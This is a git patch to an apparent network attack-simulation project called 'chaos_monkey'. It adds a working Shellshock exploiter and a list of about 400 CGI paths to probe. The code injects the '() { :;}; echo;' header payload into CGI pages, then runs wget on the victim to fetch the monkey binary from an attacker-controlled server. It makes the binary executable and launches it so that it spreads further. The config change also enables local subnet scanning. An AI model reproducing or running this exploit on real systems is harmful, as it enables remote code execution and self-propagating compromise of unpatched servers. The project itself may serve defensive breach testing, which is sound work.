From a322a619cb068387089f6abbd81b869ebd8cd90d Mon Sep 17 00:00:00 2001 From: daniel goldberg Date: Mon, 29 Aug 2016 12:09:46 +0300 Subject: [PATCH] Issue 23 - Added shellshock exploit. --- chaos_monkey/config.py | 10 +- chaos_monkey/exploit/__init__.py | 1 + chaos_monkey/exploit/shellshock.py | 208 ++++++++++ chaos_monkey/exploit/shellshock_resources.py | 406 +++++++++++++++++++ chaos_monkey/requirements.txt | 3 +- 5 files changed, 623 insertions(+), 5 deletions(-) create mode 100644 chaos_monkey/exploit/shellshock.py create mode 100644 chaos_monkey/exploit/shellshock_resources.py diff --git a/chaos_monkey/config.py b/chaos_monkey/config.py index 5ebe4f69e..683751c4f 100644 --- a/chaos_monkey/config.py +++ b/chaos_monkey/config.py @@ -1,7 +1,7 @@ import os import sys from network.range import FixedRange, RelativeRange, ClassCRange -from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter, SSHExploiter +from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter, SSHExploiter, ShellShockExploiter from network import TcpScanner, PingScanner, SMBFinger, SSHFinger,HTTPFinger from abc import ABCMeta import uuid @@ -134,7 +134,9 @@ class Configuration(object): scanner_class = TcpScanner finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger] - exploiter_classes = [SmbExploiter, WmiExploiter, RdpExploiter, Ms08_067_Exploiter, SSHExploiter] + exploiter_classes = [SmbExploiter, WmiExploiter, RdpExploiter, Ms08_067_Exploiter, # Windows exploits + SSHExploiter, ShellShockExploiter #Linux + ] # how many victims to look for in a single scan iteration victims_max_find = 14 @@ -165,11 +167,11 @@ class Configuration(object): ########################### # Auto detect and scan local subnets - local_network_scan = False + local_network_scan = True range_class = FixedRange range_size = 1 - range_fixed = ["88.198.218.174","212.73.212.91" ] + range_fixed = [''] # TCP Scanner HTTP_PORTS = [80, 8080, 443, diff --git a/chaos_monkey/exploit/__init__.py b/chaos_monkey/exploit/__init__.py index cdd3ce2bd..0a03a0f95 100644 --- a/chaos_monkey/exploit/__init__.py +++ b/chaos_monkey/exploit/__init__.py @@ -18,3 +18,4 @@ from wmiexec import WmiExploiter from smbexec import SmbExploiter from rdpgrinder import RdpExploiter from sshexec import SSHExploiter +from shellshock import ShellShockExploiter \ No newline at end of file diff --git a/chaos_monkey/exploit/shellshock.py b/chaos_monkey/exploit/shellshock.py new file mode 100644 index 000000000..2be302e69 --- /dev/null +++ b/chaos_monkey/exploit/shellshock.py @@ -0,0 +1,208 @@ +# Implementation is based on shellshock script provided https://github.com/nccgroup/shocker/blob/master/shocker.py + +import logging +from random import choice +import string +from tools import build_monkey_commandline +from exploit import HostExploiter +from model.host import VictimHost +from shellshock_resources import CGI_FILES +from model import MONKEY_ARG +from exploit.tools import get_target_monkey, HTTPTools, report_failed_login +import grequests +import requests + +__author__ = 'danielg' + +LOG = logging.getLogger(__name__) +TIMEOUT = 2 +DOWNLOAD_TIMEOUT = 60 +TEST_COMMAND = '/bin/uname -a' +DOWNLOAD_TIMEOUT = 60 # copied from rdpgrinder + + +class ShellShockExploiter(HostExploiter): + _target_os_type = ['linux'] + + _attacks = { + "Content-type": "() { :;}; echo; " + } + + def __init__(self): + self._config = __import__('config').WormConfiguration + self.HTTP = [str(port) for port in self._config.HTTP_PORTS] + self.success_flag = ''.join( + choice(string.ascii_uppercase + string.digits + ) for _ in range(20)) + + def exploit_host(self, host, depth=-1, src_path=None): + assert isinstance(host, VictimHost) + # start by picking ports + valid_ports = [(port, host.services['tcp-' + str(port)][1]) for port in self.HTTP if + 'tcp-' + str(port) in host.services] + http_ports = [port[0] for port in valid_ports if not port[1]] + https_ports = [port[0] for port in valid_ports if port[1]] + + LOG.info( + 'Scanning %s, ports [%s] for vulnerable CGI pages' % ( + host, ",".join([str(port[0]) for port in valid_ports])) + ) + + attackable_urls = [] + # now for each port we want to check the entire URL list + for port in http_ports: + urls = self.check_urls(host.ip_addr, port) + attackable_urls.extend(urls) + for port in https_ports: + urls = self.check_urls(host.ip_addr, port, is_https=True) + attackable_urls.extend(urls) + # now for each URl we want to try and see if it's attackable + exploitable_urls = [self.attempt_exploit(url) for url in attackable_urls] + exploitable_urls = [url for url in exploitable_urls if url[0] is True] + + # we want to report all vulnerable URLs even if we didn't succeed + # let's overload this + [self.report_vuln_shellshock(host, url) for url in exploitable_urls] + + # now try URLs until we install something on victim + for _, url, header, exploit in exploitable_urls: + LOG.info("Trying to attack host %s with %s URL" % (host, url)) + # same attack script as sshexec + # for any failure, quit and don't try other URLs + if not host.os.get('type'): + try: + uname_os_attack = exploit + '/bin/uname -o' + uname_os = self.attack_page(url, header, uname_os_attack) + if 'linux' in uname_os: + host.os['type'] = 'linux' + else: + LOG.info("SSH Skipping unknown os: %s", uname_os) + return False + except Exception, exc: + LOG.debug("Error running uname os commad on victim %r: (%s)", host, exc) + return False + if not host.os.get('machine'): + try: + uname_machine_attack = exploit + '/bin/uname -m' + uname_machine = self.attack_page(url, header, uname_machine_attack) + if '' != uname_machine: + host.os['machine'] = uname_machine.lower().strip() + except Exception, exc: + LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc) + return False + + src_path = src_path or get_target_monkey(host) + + if not src_path: + LOG.info("Can't find suitable monkey executable for host %r", host) + return False + + http_path, http_thread = HTTPTools.create_transfer(host, src_path) + + if not http_path: + LOG.debug("Exploiter ShellShock failed, http transfer creation failed.") + return False + + # copy the monkey + + dropper_target_path_linux = self._config.dropper_target_path_linux + + download_command = '/usr/bin/wget %s -O %s;' % ( + http_path, dropper_target_path_linux) + + download_and_run = exploit + download_command + resp = self.attack_page(url, header, download_and_run) + + http_thread.join(DOWNLOAD_TIMEOUT) + http_thread.stop() + + if (http_thread.downloads != 1) or ('ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): + LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__) + continue + + # turn the monkey into an executable + chmod = '/bin/chmod +x %s' % dropper_target_path_linux + run_path = exploit + chmod + self.attack_page(url, header, run_path) + + # run the monkey + cmdline = "%s %s" % (dropper_target_path_linux, MONKEY_ARG) + cmdline += build_monkey_commandline(host, depth - 1) + ' & ' + run_path = exploit + cmdline + resp = self.attack_page(url, header, run_path) + + LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", + self._config.dropper_target_path_linux, host, cmdline) + + if not (self.check_remote_file_exists(url,header,exploit,self._config.monkey_log_path_linux)): + LOG.info("Failed running the monkey, log file does not exist") + continue + + return True + + @classmethod + def check_remote_file_exists(cls, url, header, exploit, file_path): + """ + Checks if a remote file exists and returns the content if so + file_path should be fully qualified + """ + cmdline = '/usr/bin/head -c 4 %s' % file_path + run_path = exploit + cmdline + resp = cls.attack_page(url, header, run_path) + if resp: + LOG.info("File %s exists on remote host" % file_path) + return resp + + def attempt_exploit(self, url, attacks=_attacks): + # Flag used to identify whether the exploit has successfully caused the + # server to return a useful response + + LOG.debug("Attack Flag is: %s" % self.success_flag) + + LOG.debug("Trying exploit for %s" % url) + for header, exploit in attacks.iteritems(): + attack = exploit + ' echo ' + self.success_flag + "; " + TEST_COMMAND + result = self.attack_page(url, header, attack) + if self.success_flag in result: + LOG.info("URL %s looks vulnerable" % url) + return True, url, header, exploit + else: + LOG.debug("URL %s does not seem to be vulnerable with %s header" % (url, header)) + return False, + + @staticmethod + def attack_page(url, header, attack): + result = "" + try: + LOG.debug("Header is: %s" % header) + LOG.debug("Attack is: %s" % attack) + r = requests.get(url, headers={header: attack}, verify=False, timeout=TIMEOUT) + result = r.content + return result + except requests.exceptions.RequestException as exc: + LOG.debug("Failed to run, exception %s" % exc) + return result + + @staticmethod + def check_urls(host, port, is_https=False, url_list=CGI_FILES): + """ + Checks if which urls exist + :return: Sequence of URLs to try and attack + """ + attack_path = 'http://' + if is_https: + attack_path = 'https://' + attack_path = attack_path + str(host) + ":" + str(port) + attack_urls = [attack_path + url for url in url_list] + reqs = (grequests.head(u, verify=False, timeout=TIMEOUT) for u in attack_urls) + resps = grequests.map(reqs, size=15) + valid_resps = [resp for resp in resps if resp and resp.status_code == requests.codes.ok] + urls = [resp.url for resp in valid_resps] + return urls + + @staticmethod + def report_vuln_shellshock(host,url): + from control import ControlClient + ControlClient.send_telemetry('exploit', {'result': False, 'machine': host.__dict__, + 'exploiter': ShellShockExploiter.__name__, + 'url': url}) diff --git a/chaos_monkey/exploit/shellshock_resources.py b/chaos_monkey/exploit/shellshock_resources.py new file mode 100644 index 000000000..10cfc75a6 --- /dev/null +++ b/chaos_monkey/exploit/shellshock_resources.py @@ -0,0 +1,406 @@ +# resource for shellshock attack +# copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list + +CGI_FILES = (r'/', + r'/admin.cgi', + r'/administrator.cgi', + r'/agora.cgi', + r'/aktivate/cgi-bin/catgy.cgi', + r'/analyse.cgi', + r'/apps/web/vs_diag.cgi', + r'/axis-cgi/buffer/command.cgi', + r'/b2-include/b2edit.showposts.php', + r'/bandwidth/index.cgi', + r'/bigconf.cgi', + r'/cartcart.cgi', + r'/cart.cgi', + r'/ccbill/whereami.cgi', + r'/cgi-bin/14all-1.1.cgi', + r'/cgi-bin/14all.cgi', + r'/cgi-bin/a1disp3.cgi', + r'/cgi-bin/a1stats/a1disp3.cgi', + r'/cgi-bin/a1stats/a1disp4.cgi', + r'/cgi-bin/addbanner.cgi', + r'/cgi-bin/add_ftp.cgi', + r'/cgi-bin/adduser.cgi', + r'/cgi-bin/admin/admin.cgi', + r'/cgi-bin/admin.cgi', + r'/cgi-bin/admin/getparam.cgi', + r'/cgi-bin/adminhot.cgi', + r'/cgi-bin/admin.pl', + r'/cgi-bin/admin/setup.cgi', + r'/cgi-bin/adminwww.cgi', + r'/cgi-bin/af.cgi', + r'/cgi-bin/aglimpse.cgi', + r'/cgi-bin/alienform.cgi', + r'/cgi-bin/AnyBoard.cgi', + r'/cgi-bin/architext_query.cgi', + r'/cgi-bin/astrocam.cgi', + r'/cgi-bin/AT-admin.cgi', + r'/cgi-bin/AT-generate.cgi', + r'/cgi-bin/auction/auction.cgi', + r'/cgi-bin/auktion.cgi', + r'/cgi-bin/ax-admin.cgi', + r'/cgi-bin/ax.cgi', + r'/cgi-bin/axs.cgi', + r'/cgi-bin/badmin.cgi', + r'/cgi-bin/banner.cgi', + r'/cgi-bin/bannereditor.cgi', + r'/cgi-bin/bb-ack.sh', + r'/cgi-bin/bb-histlog.sh', + r'/cgi-bin/bb-hist.sh', + r'/cgi-bin/bb-hostsvc.sh', + r'/cgi-bin/bb-replog.sh', + r'/cgi-bin/bb-rep.sh', + r'/cgi-bin/bbs_forum.cgi', + r'/cgi-bin/bigconf.cgi', + r'/cgi-bin/bizdb1-search.cgi', + r'/cgi-bin/blog/mt-check.cgi', + r'/cgi-bin/blog/mt-load.cgi', + r'/cgi-bin/bnbform.cgi', + r'/cgi-bin/book.cgi', + r'/cgi-bin/boozt/admin/index.cgi', + r'/cgi-bin/bsguest.cgi', + r'/cgi-bin/bslist.cgi', + r'/cgi-bin/build.cgi', + r'/cgi-bin/bulk/bulk.cgi', + r'/cgi-bin/cached_feed.cgi', + r'/cgi-bin/cachemgr.cgi', + r'/cgi-bin/calendar/index.cgi', + r'/cgi-bin/cartmanager.cgi', + r'/cgi-bin/cbmc/forums.cgi', + r'/cgi-bin/ccvsblame.cgi', + r'/cgi-bin/c_download.cgi', + r'/cgi-bin/cgforum.cgi', + r'/cgi-bin/.cgi', + r'/cgi-bin/cgi_process', + r'/cgi-bin/classified.cgi', + r'/cgi-bin/classifieds.cgi', + r'/cgi-bin/classifieds/classifieds.cgi', + r'/cgi-bin/classifieds/index.cgi', + r'/cgi-bin/.cobalt/alert/service.cgi', + r'/cgi-bin/.cobalt/message/message.cgi', + r'/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi', + r'/cgi-bin/commandit.cgi', + r'/cgi-bin/commerce.cgi', + r'/cgi-bin/common/listrec.pl', + r'/cgi-bin/compatible.cgi', + r'/cgi-bin/Count.cgi', + r'/cgi-bin/csChatRBox.cgi', + r'/cgi-bin/csGuestBook.cgi', + r'/cgi-bin/csLiveSupport.cgi', + r'/cgi-bin/CSMailto.cgi', + r'/cgi-bin/CSMailto/CSMailto.cgi', + r'/cgi-bin/csNews.cgi', + r'/cgi-bin/csNewsPro.cgi', + r'/cgi-bin/csPassword.cgi', + r'/cgi-bin/csPassword/csPassword.cgi', + r'/cgi-bin/csSearch.cgi', + r'/cgi-bin/csv_db.cgi', + r'/cgi-bin/cvsblame.cgi', + r'/cgi-bin/cvslog.cgi', + r'/cgi-bin/cvsquery.cgi', + r'/cgi-bin/cvsqueryform.cgi', + r'/cgi-bin/day5datacopier.cgi', + r'/cgi-bin/day5datanotifier.cgi', + r'/cgi-bin/db_manager.cgi', + r'/cgi-bin/dbman/db.cgi', + r'/cgi-bin/dcforum.cgi', + r'/cgi-bin/dcshop.cgi', + r'/cgi-bin/dfire.cgi', + r'/cgi-bin/diagnose.cgi', + r'/cgi-bin/dig.cgi', + r'/cgi-bin/directorypro.cgi', + r'/cgi-bin/download.cgi', + r'/cgi-bin/e87_Ba79yo87.cgi', + r'/cgi-bin/emu/html/emumail.cgi', + r'/cgi-bin/emumail.cgi', + r'/cgi-bin/emumail/emumail.cgi', + r'/cgi-bin/enter.cgi', + r'/cgi-bin/environ.cgi', + r'/cgi-bin/ezadmin.cgi', + r'/cgi-bin/ezboard.cgi', + r'/cgi-bin/ezman.cgi', + r'/cgi-bin/ezshopper2/loadpage.cgi', + r'/cgi-bin/ezshopper3/loadpage.cgi', + r'/cgi-bin/ezshopper/loadpage.cgi', + r'/cgi-bin/ezshopper/search.cgi', + r'/cgi-bin/faqmanager.cgi', + r'/cgi-bin/FileSeek2.cgi', + r'/cgi-bin/FileSeek.cgi', + r'/cgi-bin/finger.cgi', + r'/cgi-bin/flexform.cgi', + r'/cgi-bin/fom.cgi', + r'/cgi-bin/fom/fom.cgi', + r'/cgi-bin/FormHandler.cgi', + r'/cgi-bin/FormMail.cgi', + r'/cgi-bin/gbadmin.cgi', + r'/cgi-bin/gbook/gbook.cgi', + r'/cgi-bin/generate.cgi', + r'/cgi-bin/getdoc.cgi', + r'/cgi-bin/gH.cgi', + r'/cgi-bin/gm-authors.cgi', + r'/cgi-bin/gm.cgi', + r'/cgi-bin/gm-cplog.cgi', + r'/cgi-bin/guestbook.cgi', + r'/cgi-bin/handler', + r'/cgi-bin/handler.cgi', + r'/cgi-bin/handler/netsonar', + r'/cgi-bin/hitview.cgi', + r'/cgi-bin/hsx.cgi', + r'/cgi-bin/html2chtml.cgi', + r'/cgi-bin/html2wml.cgi', + r'/cgi-bin/htsearch.cgi', + r'/cgi-bin/hw.sh', # testing + r'/cgi-bin/icat', + r'/cgi-bin/if/admin/nph-build.cgi', + r'/cgi-bin/ikonboard/help.cgi', + r'/cgi-bin/ImageFolio/admin/admin.cgi', + r'/cgi-bin/imageFolio.cgi', + r'/cgi-bin/index.cgi', + r'/cgi-bin/infosrch.cgi', + r'/cgi-bin/jammail.pl', + r'/cgi-bin/journal.cgi', + r'/cgi-bin/lastlines.cgi', + r'/cgi-bin/loadpage.cgi', + r'/cgi-bin/login.cgi', + r'/cgi-bin/logit.cgi', + r'/cgi-bin/log-reader.cgi', + r'/cgi-bin/lookwho.cgi', + r'/cgi-bin/lwgate.cgi', + r'/cgi-bin/MachineInfo', + r'/cgi-bin/MachineInfo', + r'/cgi-bin/magiccard.cgi', + r'/cgi-bin/mail/emumail.cgi', + r'/cgi-bin/maillist.cgi', + r'/cgi-bin/mailnews.cgi', + r'/cgi-bin/mail/nph-mr.cgi', + r'/cgi-bin/main.cgi', + r'/cgi-bin/main_menu.pl', + r'/cgi-bin/man.sh', + r'/cgi-bin/mini_logger.cgi', + r'/cgi-bin/mmstdod.cgi', + r'/cgi-bin/moin.cgi', + r'/cgi-bin/mojo/mojo.cgi', + r'/cgi-bin/mrtg.cgi', + r'/cgi-bin/mt.cgi', + r'/cgi-bin/mt/mt.cgi', + r'/cgi-bin/mt/mt-check.cgi', + r'/cgi-bin/mt/mt-load.cgi', + r'/cgi-bin/mt-static/mt-check.cgi', + r'/cgi-bin/mt-static/mt-load.cgi', + r'/cgi-bin/musicqueue.cgi', + r'/cgi-bin/myguestbook.cgi', + r'/cgi-bin/.namazu.cgi', + r'/cgi-bin/nbmember.cgi', + r'/cgi-bin/netauth.cgi', + r'/cgi-bin/netpad.cgi', + r'/cgi-bin/newsdesk.cgi', + r'/cgi-bin/nlog-smb.cgi', + r'/cgi-bin/nph-emumail.cgi', + r'/cgi-bin/nph-exploitscanget.cgi', + r'/cgi-bin/nph-publish.cgi', + r'/cgi-bin/nph-test.cgi', + r'/cgi-bin/pagelog.cgi', + r'/cgi-bin/pbcgi.cgi', + r'/cgi-bin/perlshop.cgi', + r'/cgi-bin/pfdispaly.cgi', + r'/cgi-bin/pfdisplay.cgi', + r'/cgi-bin/phf.cgi', + r'/cgi-bin/photo/manage.cgi', + r'/cgi-bin/photo/protected/manage.cgi', + r'/cgi-bin/php-cgi', + r'/cgi-bin/php.cgi', + r'/cgi-bin/php.fcgi', + r'/cgi-bin/ping.sh', + r'/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi', + r'/cgi-bin/pollssi.cgi', + r'/cgi-bin/postcards.cgi', + r'/cgi-bin/powerup/r.cgi', + r'/cgi-bin/printenv', + r'/cgi-bin/probecontrol.cgi', + r'/cgi-bin/profile.cgi', + r'/cgi-bin/publisher/search.cgi', + r'/cgi-bin/quickstore.cgi', + r'/cgi-bin/quizme.cgi', + r'/cgi-bin/ratlog.cgi', + r'/cgi-bin/r.cgi', + r'/cgi-bin/register.cgi', + r'/cgi-bin/replicator/webpage.cgi/', + r'/cgi-bin/responder.cgi', + r'/cgi-bin/robadmin.cgi', + r'/cgi-bin/robpoll.cgi', + r'/cgi-bin/rtpd.cgi', + r'/cgi-bin/sbcgi/sitebuilder.cgi', + r'/cgi-bin/scoadminreg.cgi', + r'/cgi-bin-sdb/printenv', + r'/cgi-bin/sdbsearch.cgi', + r'/cgi-bin/search', + r'/cgi-bin/search.cgi', + r'/cgi-bin/search/search.cgi', + r'/cgi-bin/sendform.cgi', + r'/cgi-bin/shop.cgi', + r'/cgi-bin/shopper.cgi', + r'/cgi-bin/shopplus.cgi', + r'/cgi-bin/showcheckins.cgi', + r'/cgi-bin/simplestguest.cgi', + r'/cgi-bin/simplestmail.cgi', + r'/cgi-bin/smartsearch.cgi', + r'/cgi-bin/smartsearch/smartsearch.cgi', + r'/cgi-bin/snorkerz.bat', + r'/cgi-bin/snorkerz.bat', + r'/cgi-bin/snorkerz.cmd', + r'/cgi-bin/snorkerz.cmd', + r'/cgi-bin/sojourn.cgi', + r'/cgi-bin/spin_client.cgi', + r'/cgi-bin/start.cgi', + r'/cgi-bin/status', + r'/cgi-bin/status_cgi', + r'/cgi-bin/store/agora.cgi', + r'/cgi-bin/store.cgi', + r'/cgi-bin/store/index.cgi', + r'/cgi-bin/survey.cgi', + r'/cgi-bin/sync.cgi', + r'/cgi-bin/talkback.cgi', + r'/cgi-bin/technote/main.cgi', + r'/cgi-bin/test2.pl', + r'/cgi-bin/test-cgi', + r'/cgi-bin/test.cgi', + r'/cgi-bin/testing_whatever', + r'/cgi-bin/test/test.cgi', + r'/cgi-bin/tidfinder.cgi', + r'/cgi-bin/tigvote.cgi', + r'/cgi-bin/title.cgi', + r'/cgi-bin/top.cgi', + r'/cgi-bin/traffic.cgi', + r'/cgi-bin/troops.cgi', + r'/cgi-bin/ttawebtop.cgi/', + r'/cgi-bin/ultraboard.cgi', + r'/cgi-bin/upload.cgi', + r'/cgi-bin/urlcount.cgi', + r'/cgi-bin/viewcvs.cgi', + r'/cgi-bin/view_help.cgi', + r'/cgi-bin/viralator.cgi', + r'/cgi-bin/virgil.cgi', + r'/cgi-bin/vote.cgi', + r'/cgi-bin/vpasswd.cgi', + r'/cgi-bin/way-board.cgi', + r'/cgi-bin/way-board/way-board.cgi', + r'/cgi-bin/webbbs.cgi', + r'/cgi-bin/webcart/webcart.cgi', + r'/cgi-bin/webdist.cgi', + r'/cgi-bin/webif.cgi', + r'/cgi-bin/webmail/html/emumail.cgi', + r'/cgi-bin/webmap.cgi', + r'/cgi-bin/webspirs.cgi', + r'/cgi-bin/Web_Store/web_store.cgi', + r'/cgi-bin/whois.cgi', + r'/cgi-bin/whois_raw.cgi', + r'/cgi-bin/whois/whois.cgi', + r'/cgi-bin/wrap', + r'/cgi-bin/wrap.cgi', + r'/cgi-bin/wwwboard.cgi.cgi', + r'/cgi-bin/YaBB/YaBB.cgi', + r'/cgi-bin/zml.cgi', + r'/cgi-mod/index.cgi', + r'/cgis/wwwboard/wwwboard.cgi', + r'/cgi-sys/addalink.cgi', + r'/cgi-sys/defaultwebpage.cgi', + r'/cgi-sys/domainredirect.cgi', + r'/cgi-sys/entropybanner.cgi', + r'/cgi-sys/entropysearch.cgi', + r'/cgi-sys/FormMail-clone.cgi', + r'/cgi-sys/helpdesk.cgi', + r'/cgi-sys/mchat.cgi', + r'/cgi-sys/randhtml.cgi', + r'/cgi-sys/realhelpdesk.cgi', + r'/cgi-sys/realsignup.cgi', + r'/cgi-sys/signup.cgi', + r'/connector.cgi', + r'/cp/rac/nsManager.cgi', + r'/create_release.sh', + r'/CSNews.cgi', + r'/csPassword.cgi', + r'/dcadmin.cgi', + r'/dcboard.cgi', + r'/dcforum.cgi', + r'/dcforum/dcforum.cgi', + r'/debuff.cgi', + r'/debug.cgi', + r'/details.cgi', + r'/edittag/edittag.cgi', + r'/emumail.cgi', + r'/enter_buff.cgi', + r'/enter_bug.cgi', + r'/ez2000/ezadmin.cgi', + r'/ez2000/ezboard.cgi', + r'/ez2000/ezman.cgi', + r'/fcgi-bin/echo', + r'/fcgi-bin/echo', + r'/fcgi-bin/echo2', + r'/fcgi-bin/echo2', + r'/Gozila.cgi', + r'/hitmatic/analyse.cgi', + r'/hp_docs/cgi-bin/index.cgi', + r'/html/cgi-bin/cgicso', + r'/html/cgi-bin/cgicso', + r'/index.cgi', + r'/info.cgi', + r'/infosrch.cgi', + r'/login.cgi', + r'/mailview.cgi', + r'/main.cgi', + r'/megabook/admin.cgi', + r'/ministats/admin.cgi', + r'/mods/apage/apage.cgi', + r'/_mt/mt.cgi', + r'/musicqueue.cgi', + r'/ncbook.cgi', + r'/newpro.cgi', + r'/newsletter.sh', + r'/oem_webstage/cgi-bin/oemapp_cgi', + r'/page.cgi', + r'/parse_xml.cgi', + r'/photodata/manage.cgi', + r'/photo/manage.cgi', + r'/print.cgi', + r'/process_buff.cgi', + r'/process_bug.cgi', + r'/pub/english.cgi', + r'/quikmail/nph-emumail.cgi', + r'/quikstore.cgi', + r'/reviews/newpro.cgi', + r'/ROADS/cgi-bin/search.pl', + r'/sample01.cgi', + r'/sample02.cgi', + r'/sample03.cgi', + r'/sample04.cgi', + r'/sampleposteddata.cgi', + r'/scancfg.cgi', + r'/scancfg.cgi', + r'/servers/link.cgi', + r'/setpasswd.cgi', + r'/SetSecurity.shm', + r'/shop/member_html.cgi', + r'/shop/normal_html.cgi', + r'/site_searcher.cgi', + r'/siteUserMod.cgi', + r'/submit.cgi', + r'/technote/print.cgi', + r'/template.cgi', + r'/test.cgi', + r'/ucsm/isSamInstalled.cgi', + r'/upload.cgi', + r'/userreg.cgi', + r'/users/scripts/submit.cgi', + r'/vood/cgi-bin/vood_view.cgi', + r'/Web_Store/web_store.cgi', + r'/webtools/bonsai/ccvsblame.cgi', + r'/webtools/bonsai/cvsblame.cgi', + r'/webtools/bonsai/cvslog.cgi', + r'/webtools/bonsai/cvsquery.cgi', + r'/webtools/bonsai/cvsqueryform.cgi', + r'/webtools/bonsai/showcheckins.cgi', + r'/wwwadmin.cgi', + r'/wwwboard.cgi', + r'/wwwboard/wwwboard.cgi') \ No newline at end of file diff --git a/chaos_monkey/requirements.txt b/chaos_monkey/requirements.txt index da7bcdbd4..0f4423f9f 100644 --- a/chaos_monkey/requirements.txt +++ b/chaos_monkey/requirements.txt @@ -12,4 +12,5 @@ psutil PyInstaller ecdsa netifaces -requests \ No newline at end of file +requests +grequests \ No newline at end of file